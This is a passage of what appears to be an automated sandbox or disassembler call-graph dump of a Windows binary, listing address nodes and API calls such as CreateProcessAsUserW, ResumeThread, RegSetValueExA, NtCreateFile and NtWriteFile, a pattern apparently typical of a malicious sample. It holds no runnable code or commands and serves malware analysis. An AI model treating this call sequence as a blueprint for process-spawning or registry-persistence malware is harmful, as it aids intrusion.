2b3941d 36638->36641 36644 2b289d0 20 API calls 36639->36644 36643 2b14860 11 API calls 36640->36643 36642 2b14860 11 API calls 36641->36642 36648 2b3943e 36642->36648 36645 2b385ba 36643->36645 36646 2b37a7e 36644->36646 36649 2b385c5 36645->36649 36647 2b14860 11 API calls 36646->36647 36652 2b37a9f 36647->36652 36650 2b147ec 11 API calls 36648->36650 36651 2b147ec 11 API calls 36649->36651 36655 2b39475 36650->36655 36653 2b385f1 36651->36653 36654 2b147ec 11 API calls 36652->36654 36656 2b385fc 36653->36656 36659 2b37ad6 36654->36659 36658 2b289d0 20 API calls 36655->36658 36657 2b289d0 20 API calls 36656->36657 36660 2b38615 36657->36660 36661 2b39499 36658->36661 36664 2b289d0 20 API calls 36659->36664 36662 2b14860 11 API calls 36660->36662 36663 2b14860 11 API calls 36661->36663 36666 2b38636 36662->36666 36665 2b394ba 36663->36665 36667 2b37afa 36664->36667 36668 2b147ec 11 API calls 36665->36668 36669 2b147ec 11 API calls 36666->36669 37795 2b2adf8 29 API calls 36667->37795 36673 2b394f1 36668->36673 36674 2b3866d 36669->36674 36671 2b37b21 36672 2b14860 11 API calls 36671->36672 36677 2b37b42 36672->36677 36675 2b289d0 20 API calls 36673->36675 36676 2b289d0 20 API calls 36674->36676 36685 2b39515 36675->36685 36678 2b38691 36676->36678 36680 2b147ec 11 API calls 36677->36680 36679 2b147ec 11 API calls 36678->36679 36681 2b386bd 36679->36681 36686 2b37b79 36680->36686 36684 2b386d5 36681->36684 36682 2b39cf5 36683 2b14860 11 API calls 36682->36683 36688 2b39d16 36683->36688 36690 2b386e0 CreateProcessAsUserW 36684->36690 36685->36682 36687 2b14860 11 API calls 36685->36687 36689 2b289d0 20 API calls 36686->36689 36698 2b39560 36687->36698 36694 2b147ec 11 API calls 36688->36694 36691 2b37b9d 36689->36691 36692 2b386f2 36690->36692 36693 2b3876e 36690->36693 36696 2b14860 11 API calls 36691->36696 36697 2b14860 11 API calls 36692->36697 36695 2b14860 11 API calls 36693->36695 36702 2b39d4d 36694->36702 36703 2b3878f 36695->36703 36704 2b37bbe 36696->36704 36699 2b38713 36697->36699 36700 2b147ec 11 API calls 36698->36700 36701 2b3871e 36699->36701 36710 2b39597 36700->36710 36708 2b147ec 11 API calls 36701->36708 36705 2b289d0 20 API calls 36702->36705 36706 2b147ec 11 API calls 36703->36706 36707 2b147ec 11 API calls 36704->36707 36711 2b39d71 36705->36711 36715 2b387c6 36706->36715 36716 2b37bf5 36707->36716 36709 2b3874a 36708->36709 36713 2b38755 36709->36713 36714 2b289d0 20 API calls 36710->36714 36712 2b14860 11 API calls 36711->36712 36719 2b39d92 36712->36719 36722 2b289d0 20 API calls 36713->36722 36717 2b395bb 36714->36717 36720 2b289d0 20 API calls 36715->36720 36721 2b289d0 20 API calls 36716->36721 36718 2b14860 11 API calls 36717->36718 36728 2b395dc 36718->36728 36725 2b147ec 11 API calls 36719->36725 36723 2b387ea 36720->36723 36724 2b37c19 36721->36724 36722->36693 36726 2b14860 11 API calls 36723->36726 36727 2b14860 11 API calls 36724->36727 36730 2b39dc9 36725->36730 36731 2b3880b 36726->36731 36732 2b37c3a 36727->36732 36729 2b147ec 11 API calls 36728->36729 36736 2b39613 36729->36736 36733 2b289d0 20 API calls 36730->36733 36734 2b147ec 11 API calls 36731->36734 36735 2b147ec 11 API calls 36732->36735 36737 2b39ded 36733->36737 36742 2b38842 36734->36742 36740 2b37c71 36735->36740 36739 2b289d0 20 API calls 36736->36739 36738 2b14860 11 API calls 36737->36738 36744 2b39e0e 36738->36744 36741 2b39637 36739->36741 36746 2b289d0 20 API calls 36740->36746 36743 2b14860 11 API calls 36741->36743 36745 2b289d0 20 API calls 36742->36745 36750 2b39658 36743->36750 36749 2b147ec 11 API calls 36744->36749 36747 2b38866 36745->36747 36748 2b37c95 36746->36748 36751 2b149f8 11 API calls 36747->36751 36753 2b14860 11 API calls 36748->36753 36755 2b39e45 36749->36755 36754 2b147ec 11 API calls 36750->36754 36752 2b3888a 36751->36752 36756 2b14860 11 API calls 36752->36756 36759 2b37cd5 36753->36759 36760 2b3968f 36754->36760 36757 2b289d0 20 API calls 36755->36757 36758 2b388b9 36756->36758 36766 2b39e69 36757->36766 36761 2b388c4 36758->36761 36762 2b147ec 11 API calls 36759->36762 36763 2b289d0 20 API calls 36760->36763 36767 2b147ec 11 API calls 36761->36767 36769 2b37d0c 36762->36769 36764 2b396b3 36763->36764 37333 2b2f094 36764->37333 36771 2b289d0 20 API calls 36766->36771 36768 2b388f0 36767->36768 36776 2b388fb 36768->36776 36773 2b289d0 20 API calls 36769->36773 36775 2b39e9c 36771->36775 36772 2b14860 11 API calls 36778 2b396f7 36772->36778 36774 2b37d30 36773->36774 36777 2b14860 11 API calls 36774->36777 36780 2b289d0 20 API calls 36775->36780 36779 2b289d0 20 API calls 36776->36779 36784 2b37d51 36777->36784 36782 2b14860 11 API calls 36778->36782 36781 2b38914 36779->36781 36785 2b39ecf 36780->36785 36783 2b14860 11 API calls 36781->36783 36787 2b3972f 36782->36787 36788 2b38935 36783->36788 36786 2b147ec 11 API calls 36784->36786 36789 2b289d0 20 API calls 36785->36789 36792 2b37d88 36786->36792 36790 2b147ec 11 API calls 36787->36790 36791 2b147ec 11 API calls 36788->36791 36794 2b39f02 36789->36794 36797 2b39766 36790->36797 36795 2b3896c 36791->36795 36793 2b289d0 20 API calls 36792->36793 36796 2b37dac 36793->36796 36798 2b289d0 20 API calls 36794->36798 36802 2b289d0 20 API calls 36795->36802 36799 2b14860 11 API calls 36796->36799 36800 2b289d0 20 API calls 36797->36800 36801 2b39f35 36798->36801 36808 2b37dcd 36799->36808 36803 2b3978a 36800->36803 36804 2b14860 11 API calls 36801->36804 36805 2b38990 36802->36805 36806 2b14860 11 API calls 36803->36806 36809 2b39f56 36804->36809 36807 2b14860 11 API calls 36805->36807 36811 2b397ab 36806->36811 36812 2b389b1 36807->36812 36810 2b147ec 11 API calls 36808->36810 36813 2b147ec 11 API calls 36809->36813 36816 2b37e04 36810->36816 36814 2b147ec 11 API calls 36811->36814 36815 2b147ec 11 API calls 36812->36815 36817 2b39f8d 36813->36817 36820 2b397e2 36814->36820 36821 2b389e8 36815->36821 36818 2b289d0 20 API calls 36816->36818 36823 2b289d0 20 API calls 36817->36823 36819 2b37e28 36818->36819 37796 2b25aec 42 API calls 36819->37796 36827 2b289d0 20 API calls 36820->36827 36825 2b289d0 20 API calls 36821->36825 36824 2b39fb1 36823->36824 36828 2b14860 11 API calls 36824->36828 36829 2b38a0c 36825->36829 36831 2b39806 36827->36831 36841 2b39fd2 36828->36841 37799 2b2d164 23 API calls 36829->37799 36830 2b37e54 36838 2b14bcc 11 API calls 36830->36838 37340 2b17e5c 36831->37340 36835 2b38a20 36837 2b14860 11 API calls 36835->36837 36836 2b39aef 36840 2b14860 11 API calls 36836->36840 36845 2b38a46 36837->36845 36842 2b37e69 36838->36842 36839 2b14860 11 API calls 36846 2b39839 36839->36846 36847 2b39b10 36840->36847 36844 2b147ec 11 API calls 36841->36844 36843 2b14860 11 API calls 36842->36843 36849 2b37e8a 36843->36849 36852 2b3a009 36844->36852 36848 2b147ec 11 API calls 36845->36848 36850 2b147ec 11 API calls 36846->36850 36851 2b147ec 11 API calls 36847->36851 36856 2b38a7d 36848->36856 36853 2b147ec 11 API calls 36849->36853 36857 2b39870 36850->36857 36858 2b39b47 36851->36858 36854 2b289d0 20 API calls 36852->36854 36861 2b37ec1 36853->36861 36855 2b3a02d 36854->36855 36859 2b14860 11 API calls 36855->36859 36860 2b289d0 20 API calls 36856->36860 36864 2b289d0 20 API calls 36857->36864 36862 2b289d0 20 API calls 36858->36862 36871 2b3a04e 36859->36871 36863 2b38aa1 36860->36863 36868 2b289d0 20 API calls 36861->36868 36866 2b39b6b 36862->36866 36867 2b14860 11 API calls 36863->36867 36865 2b39894 36864->36865 36869 2b14860 11 API calls 36865->36869 36870 2b14860 11 API calls 36866->36870 36874 2b38ac2 36867->36874 36872 2b37ee5 36868->36872 36876 2b398b5 36869->36876 36877 2b39b8c 36870->36877 36873 2b147ec 11 API calls 36871->36873 36875 2b149f8 11 API calls 36872->36875 36883 2b3a085 36873->36883 36879 2b147ec 11 API calls 36874->36879 36878 2b37f02 36875->36878 36881 2b147ec 11 API calls 36876->36881 36882 2b147ec 11 API calls 36877->36882 37797 2b27e50 17 API calls 36878->37797 36887 2b38af9 36879->36887 36888 2b398ec 36881->36888 36889 2b39bc3 36882->36889 36886 2b289d0 20 API calls 36883->36886 36884 2b37f08 36885 2b14860 11 API calls 36884->36885 36890 2b37f29 36885->36890 36895 2b3a0a9 36886->36895 36891 2b289d0 20 API calls 36887->36891 36893 2b289d0 20 API calls 36888->36893 36894 2b289d0 20 API calls 36889->36894 36898 2b147ec 11 API calls 36890->36898 36892 2b38b1d 36891->36892 36897 2b14860 11 API calls 36892->36897 36899 2b39910 36893->36899 36896 2b39be7 36894->36896 36901 2b289d0 20 API calls 36895->36901 36900 2b14860 11 API calls 36896->36900 36903 2b38b3e 36897->36903 36904 2b37f60 36898->36904 36902 2b14860 11 API calls 36899->36902 36906 2b39c08 36900->36906 36907 2b3a0dc 36901->36907 36905 2b39931 36902->36905 36908 2b147ec 11 API calls 36903->36908 36909 2b289d0 20 API calls 36904->36909 36910 2b147ec 11 API calls 36905->36910 36911 2b147ec 11 API calls 36906->36911 36912 2b289d0 20 API calls 36907->36912 36915 2b38b75 36908->36915 36913 2b37f84 36909->36913 36916 2b39968 36910->36916 36917 2b39c3f 36911->36917 36918 2b3a10f 36912->36918 36914 2b14860 11 API calls 36913->36914 36920 2b37fa5 36914->36920 36919 2b289d0 20 API calls 36915->36919 36921 2b289d0 20 API calls 36916->36921 36922 2b289d0 20 API calls 36917->36922 36923 2b289d0 20 API calls 36918->36923 36924 2b38b99 36919->36924 36925 2b147ec 11 API calls 36920->36925 36926 2b3998c 36921->36926 36927 2b39c63 36922->36927 36935 2b3a142 36923->36935 36928 2b38ba2 36924->36928 36929 2b38bb9 36924->36929 36938 2b37fdc 36925->36938 37344 2b2e358 36926->37344 36933 2b14860 11 API calls 36927->36933 37800 2b28730 17 API calls 36928->37800 36931 2b14860 11 API calls 36929->36931 36942 2b38bda 36931->36942 36940 2b39c84 36933->36940 36941 2b289d0 20 API calls 36935->36941 36936 2b14530 11 API calls 36937 2b399b1 36936->36937 36939 2b14860 11 API calls 36937->36939 36943 2b289d0 20 API calls 36938->36943 36948 2b399d2 36939->36948 36944 2b147ec 11 API calls 36940->36944 36949 2b3a175 36941->36949 36946 2b147ec 11 API calls 36942->36946 36945 2b38000 36943->36945 36951 2b39cbb 36944->36951 36947 2b14860 11 API calls 36945->36947 36953 2b38c11 36946->36953 36955 2b38021 36947->36955 36950 2b147ec 11 API calls 36948->36950 36952 2b289d0 20 API calls 36949->36952 36963 2b39a09 36950->36963 36956 2b289d0 20 API calls 36951->36956 36954 2b3a1a8 36952->36954 36958 2b289d0 20 API calls 36953->36958 36957 2b14860 11 API calls 36954->36957 36960 2b147ec 11 API calls 36955->36960 36959 2b39cdf 36956->36959 36968 2b3a1c9 36957->36968 36961 2b38c35 36958->36961 37364 2b149f8 36959->37364 36969 2b38058 36960->36969 36962 2b14860 11 API calls 36961->36962 36972 2b38c56 36962->36972 36966 2b289d0 20 API calls 36963->36966 36970 2b39a2d 36966->36970 36971 2b147ec 11 API calls 36968->36971 36974 2b289d0 20 API calls 36969->36974 36973 2b14860 11 API calls 36970->36973 36979 2b3a200 36971->36979 36976 2b147ec 11 API calls 36972->36976 36978 2b39a4e 36973->36978 36975 2b3807c 36974->36975 36977 2b14860 11 API calls 36975->36977 36982 2b38c8d 36976->36982 36984 2b3809d 36977->36984 36980 2b147ec 11 API calls 36978->36980 36981 2b289d0 20 API calls 36979->36981 36989 2b39a85 36980->36989 36983 2b3a224 36981->36983 36986 2b289d0 20 API calls 36982->36986 36985 2b14860 11 API calls 36983->36985 36987 2b147ec 11 API calls 36984->36987 36992 2b3a245 36985->36992 36988 2b38cb1 36986->36988 36993 2b380d4 36987->36993 36990 2b14860 11 API calls 36988->36990 36991 2b289d0 20 API calls 36989->36991 36994 2b38cd2 36990->36994 37001 2b39aa9 36991->37001 36995 2b147ec 11 API calls 36992->36995 36996 2b289d0 20 API calls 36993->36996 36998 2b147ec 11 API calls 36994->36998 37000 2b3a27c 36995->37000 36997 2b380f8 36996->36997 37798 2b2b118 39 API calls 36997->37798 37004 2b38d09 36998->37004 37003 2b289d0 20 API calls 37000->37003 37349 2b2dc8c 37001->37349 37008 2b3a2a0 37003->37008 37006 2b289d0 20 API calls 37004->37006 37005 2b38109 37007 2b38d2d ResumeThread 37006->37007 37009 2b14860 11 API calls 37007->37009 37010 2b289d0 20 API calls 37008->37010 37012 2b38d59 37009->37012 37011 2b3a2d3 37010->37011 37013 2b14860 11 API calls 37011->37013 37014 2b147ec 11 API calls 37012->37014 37015 2b3a2f4 37013->37015 37017 2b38d90 37014->37017 37016 2b147ec 11 API calls 37015->37016 37020 2b3a32b 37016->37020 37018 2b289d0 20 API calls 37017->37018 37019 2b38db4 37018->37019 37021 2b14860 11 API calls 37019->37021 37022 2b289d0 20 API calls 37020->37022 37025 2b38dd5 37021->37025 37023 2b3a34f 37022->37023 37024 2b14860 11 API calls 37023->37024 37027 2b3a370 37024->37027 37026 2b147ec 11 API calls 37025->37026 37029 2b38e0c 37026->37029 37028 2b147ec 11 API calls 37027->37028 37032 2b3a3a7 37028->37032 37030 2b289d0 20 API calls 37029->37030 37031 2b38e30 37030->37031 37033 2b14860 11 API calls 37031->37033 37034 2b289d0 20 API calls 37032->37034 37037 2b38e51 37033->37037 37035 2b3a3cb 37034->37035 37036 2b14860 11 API calls 37035->37036 37039 2b3a3ec 37036->37039 37038 2b147ec 11 API calls 37037->37038 37040 2b38e88 37038->37040 37041 2b147ec 11 API calls 37039->37041 37042 2b289d0 20 API calls 37040->37042 37044 2b3a423 37041->37044 37043 2b38eac CloseHandle 37042->37043 37045 2b14860 11 API calls 37043->37045 37046 2b289d0 20 API calls 37044->37046 37047 2b38ed8 37045->37047 37048 2b3a447 37046->37048 37049 2b147ec 11 API calls 37047->37049 37050 2b289d0 20 API calls 37048->37050 37051 2b38f0f 37049->37051 37053 2b3a47a 37050->37053 37052 2b289d0 20 API calls 37051->37052 37054 2b38f33 37052->37054 37055 2b289d0 20 API calls 37053->37055 37056 2b14860 11 API calls 37054->37056 37057 2b3a4ad 37055->37057 37058 2b38f54 37056->37058 37059 2b289d0 20 API calls 37057->37059 37060 2b147ec 11 API calls 37058->37060 37061 2b3a4e0 37059->37061 37062 2b38f8b 37060->37062 37064 2b289d0 20 API calls 37061->37064 37063 2b289d0 20 API calls 37062->37063 37065 2b38faf 37063->37065 37066 2b3a513 37064->37066 37067 2b14860 11 API calls 37065->37067 37068 2b14860 11 API calls 37066->37068 37070 2b38fd0 37067->37070 37069 2b3a534 37068->37069 37071 2b147ec 11 API calls 37069->37071 37072 2b147ec 11 API calls 37070->37072 37073 2b3a56b 37071->37073 37074 2b39007 37072->37074 37075 2b289d0 20 API calls 37073->37075 37076 2b289d0 20 API calls 37074->37076 37077 2b3a58f 37075->37077 37078 2b3902b 37076->37078 37080 2b14860 11 API calls 37077->37080 37079 2b14860 11 API calls 37078->37079 37082 2b3904c 37079->37082 37081 2b3a5b0 37080->37081 37083 2b147ec 11 API calls 37081->37083 37084 2b147ec 11 API calls 37082->37084 37085 2b3a5e7 37083->37085 37086 2b39083 37084->37086 37087 2b289d0 20 API calls 37085->37087 37088 2b289d0 20 API calls 37086->37088 37091 2b3a60b 37087->37091 37089 2b390a7 37088->37089 37090 2b14860 11 API calls 37089->37090 37092 2b390c8 37090->37092 37093 2b289d0 20 API calls 37091->37093 37094 2b147ec 11 API calls 37092->37094 37095 2b3a63e 37093->37095 37097 2b390ff 37094->37097 37096 2b289d0 20 API calls 37095->37096 37100 2b3a671 37096->37100 37098 2b289d0 20 API calls 37097->37098 37099 2b39123 37098->37099 37101 2b14860 11 API calls 37099->37101 37102 2b289d0 20 API calls 37100->37102 37103 2b39144 37101->37103 37105 2b3a6a4 37102->37105 37104 2b147ec 11 API calls 37103->37104 37107 2b3917b 37104->37107 37106 2b289d0 20 API calls 37105->37106 37108 2b3a6d7 37106->37108 37109 2b289d0 20 API calls 37107->37109 37111 2b289d0 20 API calls 37108->37111 37110 2b3919f 37109->37110 37112 2b14860 11 API calls 37110->37112 37113 2b3a70a 37111->37113 37115 2b391c0 37112->37115 37114 2b14860 11 API calls 37113->37114 37117 2b3a72b 37114->37117 37116 2b147ec 11 API calls 37115->37116 37119 2b391f7 37116->37119 37118 2b147ec 11 API calls 37117->37118 37120 2b3a762 37118->37120 37121 2b289d0 20 API calls 37119->37121 37123 2b289d0 20 API calls 37120->37123 37122 2b3921b 37121->37122 37801 2b2894c LoadLibraryW 37122->37801 37124 2b3a786 37123->37124 37125 2b14860 11 API calls 37124->37125 37130 2b3a7a7 37125->37130 37128 2b2894c 21 API calls 37129 2b3924e 37128->37129 37131 2b2894c 21 API calls 37129->37131 37134 2b147ec 11 API calls 37130->37134 37132 2b39262 37131->37132 37133 2b2894c 21 API calls 37132->37133 37135 2b39276 37133->37135 37138 2b3a7de 37134->37138 37136 2b2894c 21 API calls 37135->37136 37137 2b3928a 37136->37137 37139 2b2894c 21 API calls 37137->37139 37141 2b289d0 20 API calls 37138->37141 37140 2b3929e CloseHandle 37139->37140 37142 2b14860 11 API calls 37140->37142 37143 2b3a802 37141->37143 37145 2b392ca 37142->37145 37144 2b14860 11 API calls 37143->37144 37146 2b3a823 37144->37146 37147 2b147ec 11 API calls 37145->37147 37148 2b147ec 11 API calls 37146->37148 37149 2b39301 37147->37149 37151 2b3a85a 37148->37151 37150 2b289d0 20 API calls 37149->37150 37152 2b39325 37150->37152 37153 2b289d0 20 API calls 37151->37153 37154 2b14860 11 API calls 37152->37154 37155 2b3a87e 37153->37155 37157 2b39346 37154->37157 37156 2b14860 11 API calls 37155->37156 37158 2b3a89f 37156->37158 37159 2b147ec 11 API calls 37157->37159 37160 2b147ec 11 API calls 37158->37160 37161 2b3937d 37159->37161 37163 2b3a8d6 37160->37163 37162 2b289d0 20 API calls 37161->37162 37162->36620 37164 2b289d0 20 API calls 37163->37164 37165 2b3a8fa 37164->37165 37166 2b14860 11 API calls 37165->37166 37167 2b3a91b 37166->37167 37168 2b147ec 11 API calls 37167->37168 37169 2b3a952 37168->37169 37170 2b289d0 20 API calls 37169->37170 37171 2b3a976 37170->37171 37172 2b289d0 20 API calls 37171->37172 37173 2b3a985 37172->37173 37174 2b289d0 20 API calls 37173->37174 37175 2b3a994 37174->37175 37176 2b289d0 20 API calls 37175->37176 37177 2b3a9a3 37176->37177 37178 2b289d0 20 API calls 37177->37178 37179 2b3a9b2 37178->37179 37180 2b289d0 20 API calls 37179->37180 37181 2b3a9c1 37180->37181 37182 2b289d0 20 API calls 37181->37182 37183 2b3a9d0 37182->37183 37184 2b289d0 20 API calls 37183->37184 37185 2b3a9df 37184->37185 37186 2b289d0 20 API calls 37185->37186 37187 2b3a9ee 37186->37187 37188 2b289d0 20 API calls 37187->37188 37189 2b3a9fd 37188->37189 37190 2b289d0 20 API calls 37189->37190 37191 2b3aa0c 37190->37191 37192 2b289d0 20 API calls 37191->37192 37193 2b3aa1b 37192->37193 37194 2b289d0 20 API calls 37193->37194 37195 2b3aa2a 37194->37195 37196 2b289d0 20 API calls 37195->37196 37197 2b3aa39 37196->37197 37198 2b289d0 20 API calls 37197->37198 37199 2b3aa48 37198->37199 37200 2b289d0 20 API calls 37199->37200 37201 2b3aa57 37200->37201 37202 2b14860 11 API calls 37201->37202 37203 2b3aa78 37202->37203 37204 2b147ec 11 API calls 37203->37204 37205 2b3aaaf 37204->37205 37206 2b289d0 20 API calls 37205->37206 37207 2b3aad3 37206->37207 37208 2b289d0 20 API calls 37207->37208 37209 2b3ab06 37208->37209 37210 2b289d0 20 API calls 37209->37210 37211 2b3ab39 37210->37211 37212 2b289d0 20 API calls 37211->37212 37213 2b3ab6c 37212->37213 37214 2b289d0 20 API calls 37213->37214 37215 2b3ab9f 37214->37215 37216 2b289d0 20 API calls 37215->37216 37217 2b3abd2 37216->37217 37218 2b289d0 20 API calls 37217->37218 37219 2b3ac05 37218->37219 37220 2b289d0 20 API calls 37219->37220 37221 2b3ac38 37220->37221 37222 2b14860 11 API calls 37221->37222 37223 2b3ac59 37222->37223 37224 2b147ec 11 API calls 37223->37224 37225 2b3ac90 37224->37225 37226 2b289d0 20 API calls 37225->37226 37227 2b3acb4 37226->37227 37228 2b14860 11 API calls 37227->37228 37229 2b3acd5 37228->37229 37230 2b147ec 11 API calls 37229->37230 37231 2b3ad0c 37230->37231 37232 2b289d0 20 API calls 37231->37232 37233 2b3ad30 37232->37233 37234 2b14860 11 API calls 37233->37234 37235 2b3ad51 37234->37235 37236 2b147ec 11 API calls 37235->37236 37237 2b3ad88 37236->37237 37238 2b289d0 20 API calls 37237->37238 37239 2b3adac 37238->37239 37240 2b289d0 20 API calls 37239->37240 37241 2b3addf 37240->37241 37242 2b289d0 20 API calls 37241->37242 37243 2b3ae12 37242->37243 37244 2b289d0 20 API calls 37243->37244 37245 2b3ae45 37244->37245 37246 2b289d0 20 API calls 37245->37246 37247 2b3ae78 37246->37247 37248 2b289d0 20 API calls 37247->37248 37249 2b3aeab 37248->37249 37250 2b289d0 20 API calls 37249->37250 37251 2b3aede 37250->37251 37252 2b289d0 20 API calls 37251->37252 37253 2b3af11 37252->37253 37254 2b289d0 20 API calls 37253->37254 37255 2b3af44 37254->37255 37256 2b289d0 20 API calls 37255->37256 37257 2b3af77 37256->37257 37258 2b289d0 20 API calls 37257->37258 37259 2b3afaa 37258->37259 37260 2b289d0 20 API calls 37259->37260 37261 2b3afdd 37260->37261 37262 2b289d0 20 API calls 37261->37262 37263 2b3b010 37262->37263 37264 2b289d0 20 API calls 37263->37264 37265 2b3b043 37264->37265 37266 2b289d0 20 API calls 37265->37266 37267 2b3b076 37266->37267 37268 2b289d0 20 API calls 37267->37268 37269 2b3b0a9 37268->37269 37270 2b289d0 20 API calls 37269->37270 37271 2b3b0dc 37270->37271 37272 2b289d0 20 API calls 37271->37272 37273 2b3b10f 37272->37273 37274 2b289d0 20 API calls 37273->37274 37275 2b3b142 37274->37275 37276 2b289d0 20 API calls 37275->37276 37277 2b3b175 37276->37277 37771 2b28338 37277->37771 37280 2b14860 11 API calls 37281 2b3b1a5 37280->37281 37282 2b147ec 11 API calls 37281->37282 37283 2b3b1dc 37282->37283 37284 2b289d0 20 API calls 37283->37284 37285 2b3b200 37284->37285 37286 2b14860 11 API calls 37285->37286 37287 2b3b221 37286->37287 37288 2b147ec 11 API calls 37287->37288 37289 2b3b258 37288->37289 37290 2b289d0 20 API calls 37289->37290 37291 2b3b27c 37290->37291 37292 2b14860 11 API calls 37291->37292 37293 2b3b29d 37292->37293 37294 2b147ec 11 API calls 37293->37294 37295 2b3b2d4 37294->37295 37296 2b289d0 20 API calls 37295->37296 37297 2b3b2f8 ExitProcess 37296->37297 37299 2b289e4 37298->37299 37300 2b281cc 17 API calls 37299->37300 37301 2b28a1d 37300->37301 37302 2b28274 15 API calls 37301->37302 37303 2b28a36 37302->37303 37304 2b27d78 18 API calls 37303->37304 37305 2b28a95 37304->37305 37306 2b28338 18 API calls 37305->37306 37307 2b28aa4 FreeLibrary 37306->37307 37308 2b28abc 37307->37308 37309 2b14500 11 API calls 37308->37309 37310 2b28ac9 37309->37310 37310->36484 37317 2b2e114 37311->37317 37312 2b2e197 37313 2b144dc 11 API calls 37312->37313 37315 2b2e19f 37313->37315 37314 2b149f8 11 API calls 37314->37317 37316 2b14530 11 API calls 37315->37316 37318 2b2e1aa 37316->37318 37317->37312 37317->37314 37319 2b14500 11 API calls 37318->37319 37320 2b2e1c4 37319->37320 37320->36511 37322 2b2f22b 37321->37322 37323 2b2f256 RegOpenKeyA 37322->37323 37324 2b2f264 37323->37324 37325 2b149f8 11 API calls 37324->37325 37326 2b2f27c 37325->37326 37327 2b2f289 RegSetValueExA RegCloseKey 37326->37327 37328 2b2f2ad 37327->37328 37329 2b14500 11 API calls 37328->37329 37330 2b2f2ba 37329->37330 37331 2b144dc 11 API calls 37330->37331 37332 2b2f2c2 37331->37332 37332->36514 37338 2b2f0b9 37333->37338 37334 2b2f0e5 37336 2b144dc 11 API calls 37334->37336 37337 2b2f0fa 37336->37337 37337->36772 37338->37334 37808 2b146c4 11 API calls 37338->37808 37809 2b14530 11 API calls 37338->37809 37810 2b149a0 37340->37810 37343 2b17e71 37343->36836 37343->36839 37345 2b14bcc 11 API calls 37344->37345 37348 2b2e370 37345->37348 37346 2b2e391 37346->36936 37347 2b149f8 11 API calls 37347->37348 37348->37346 37348->37347 37350 2b2dca2 37349->37350 37812 2b14f20 37350->37812 37352 2b2dcaa 37353 2b2dcca RtlDosPathNameToNtPathName_U 37352->37353 37816 2b2dbdc 37353->37816 37355 2b2dce6 NtCreateFile 37356 2b2dd11 37355->37356 37357 2b149f8 11 API calls 37356->37357 37358 2b2dd23 NtWriteFile NtClose 37357->37358 37359 2b2dd4d 37358->37359 37817 2b14c60 37359->37817 37362 2b144dc 11 API calls 37363 2b2dd5d 37362->37363 37363->36836 37366 2b149ac 37364->37366 37365 2b149e7 37370 2b28d70 37365->37370 37366->37365 37367 2b145a0 11 API calls 37366->37367 37368 2b149c3 37367->37368 37368->37365 37369 2b12c2c 11 API calls 37368->37369 37369->37365 37371 2b28d78 37370->37371 37372 2b14860 11 API calls 37371->37372 37373 2b28dbb 37372->37373 37374 2b147ec 11 API calls 37373->37374 37375 2b28de0 37374->37375 37376 2b289d0 20 API calls 37375->37376 37377 2b28dfb 37376->37377 37378 2b14860 11 API calls 37377->37378 37379 2b28e14 37378->37379 37380 2b147ec 11 API calls 37379->37380 37381 2b28e39 37380->37381 37382 2b289d0 20 API calls 37381->37382 37383 2b28e54 37382->37383 37384 2b2a8b7 37383->37384 37385 2b14860 11 API calls 37383->37385 37386 2b14500 11 API calls 37384->37386 37389 2b28e85 37385->37389 37387 2b2a8d4 37386->37387 37388 2b14500 11 API calls 37387->37388 37390 2b2a8e4 37388->37390 37393 2b147ec 11 API calls 37389->37393 37391 2b14c60 SysFreeString 37390->37391 37392 2b2a8ef 37391->37392 37394 2b14500 11 API calls 37392->37394 37398 2b28eaa 37393->37398 37395 2b2a8ff 37394->37395 37396 2b144dc 11 API calls 37395->37396 37397 2b2a907 37396->37397 37399 2b14500 11 API calls 37397->37399 37401 2b289d0 20 API calls 37398->37401 37400 2b2a914 37399->37400 37402 2b14500 11 API calls 37400->37402 37403 2b28ec5 37401->37403 37404 2b2a921 37402->37404 37405 2b14860 11 API calls 37403->37405 37404->36682 37406 2b28ede 37405->37406 37407 2b147ec 11 API calls 37406->37407 37408 2b28f03 37407->37408 37409 2b289d0 20 API calls 37408->37409 37410 2b28f1e 37409->37410 37410->37384 37411 2b14860 11 API calls 37410->37411 37412 2b28f66 37411->37412 37413 2b147ec 11 API calls 37412->37413 37414 2b28f8b 37413->37414 37415 2b289d0 20 API calls 37414->37415 37416 2b28fa6 37415->37416 37417 2b14860 11 API calls 37416->37417 37418 2b28fbf 37417->37418 37419 2b147ec 11 API calls 37418->37419 37420 2b28fe4 37419->37420 37421 2b289d0 20 API calls 37420->37421 37422 2b28fff 37421->37422 37423 2b14860 11 API calls 37422->37423 37424 2b29044 37423->37424 37425 2b147ec 11 API calls 37424->37425 37426 2b29069 37425->37426 37427 2b289d0 20 API calls 37426->37427 37428 2b29084 37427->37428 37429 2b14860 11 API calls 37428->37429 37430 2b2909d 37429->37430 37431 2b147ec 11 API calls 37430->37431 37432 2b290c5 37431->37432 37433 2b289d0 20 API calls 37432->37433 37434 2b290e3 37433->37434 37435 2b14860 11 API calls 37434->37435 37436 2b290ff 37435->37436 37437 2b147ec 11 API calls 37436->37437 37438 2b29130 37437->37438 37439 2b289d0 20 API calls 37438->37439 37440 2b29154 37439->37440 37441 2b14860 11 API calls 37440->37441 37442 2b29170 37441->37442 37443 2b147ec 11 API calls 37442->37443 37444 2b291a1 37443->37444 37445 2b289d0 20 API calls 37444->37445 37446 2b291c5 37445->37446 37447 2b14860 11 API calls 37446->37447 37448 2b291e1 37447->37448 37449 2b147ec 11 API calls 37448->37449 37450 2b29212 37449->37450 37451 2b289d0 20 API calls 37450->37451 37452 2b29236 37451->37452 37820 2b28788 37452->37820 37455 2b292e8 37456 2b14860 11 API calls 37455->37456 37458 2b29304 37456->37458 37457 2b14860 11 API calls 37459 2b29293 37457->37459 37461 2b147ec 11 API calls 37458->37461 37460 2b147ec 11 API calls 37459->37460 37463 2b292c4 37460->37463 37462 2b29335 37461->37462 37464 2b289d0 20 API calls 37462->37464 37465 2b289d0 20 API calls 37463->37465 37466 2b29359 37464->37466 37465->37455 37467 2b289d0 20 API calls 37466->37467 37468 2b2938c 37467->37468 37469 2b14860 11 API calls 37468->37469 37470 2b293a8 37469->37470 37471 2b147ec 11 API calls 37470->37471 37472 2b293d9 37471->37472 37473 2b289d0 20 API calls 37472->37473 37474 2b293fd 37473->37474 37475 2b14860 11 API calls 37474->37475 37476 2b29419 37475->37476 37477 2b147ec 11 API calls 37476->37477 37478 2b2944a 37477->37478 37479 2b289d0 20 API calls 37478->37479 37480 2b2946e 37479->37480 37481 2b12ee0 2 API calls 37480->37481 37482 2b29473 37481->37482 37483 2b14860 11 API calls 37482->37483 37484 2b294b6 37483->37484 37485 2b147ec 11 API calls 37484->37485 37486 2b294e7 37485->37486 37487 2b289d0 20 API calls 37486->37487 37488 2b2950b 37487->37488 37489 2b14860 11 API calls 37488->37489 37490 